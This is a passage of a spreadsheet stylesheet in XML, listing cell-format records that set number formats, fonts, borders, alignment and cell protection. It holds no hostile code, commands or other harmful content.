    <xf numFmtId="0" fontId="52" fillId="0" borderId="4" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="0" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="44" fillId="0" borderId="0" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="0" xfId="63" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="0" borderId="9" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="0" borderId="7" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="5" xfId="23" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="60" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="61" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="61" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="78" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="177" fontId="33" fillId="0" borderId="0" xfId="78" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="177" fontId="12" fillId="0" borderId="0" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="85" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="1" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="43" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="9" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="9" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="46" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="9" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="10" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="0" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="9" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="10" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="45" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="9" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="12" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="46" fillId="0" borderId="10" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="46" fillId="0" borderId="0" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="10" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="0" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="7" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="5" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="45" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="60" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="33" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="12" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="35" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="11" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="39" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="39" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="39" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="9" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="9" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="9" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="10" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="9" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="7" xfId="78" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="5" xfId="78" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="37" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="12" fillId="0" borderId="0" xfId="85" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="1" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="8" xfId="23" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="7" xfId="96" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="5" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="6" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="7" xfId="96" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="5" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="12" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="12" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="2" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="35" fillId="0" borderId="2" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="62" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="14" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="2" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="62" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="0" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="10" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="1" xfId="86" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="13" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="1" xfId="86" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="12" fillId="0" borderId="0" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="84" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="12" fillId="0" borderId="0" xfId="84" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="85" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="84" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="84" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="52" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="2" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="10" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="8" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="10" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="5" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="12" fillId="0" borderId="0" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="179" fontId="12" fillId="0" borderId="0" xfId="84" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="30" fillId="0" borderId="0" xfId="85" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="12" fillId="0" borderId="0" xfId="85" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="1" xfId="64" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="179" fontId="52" fillId="0" borderId="1" xfId="64" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="1" xfId="64" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="37" fillId="0" borderId="1" xfId="64" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
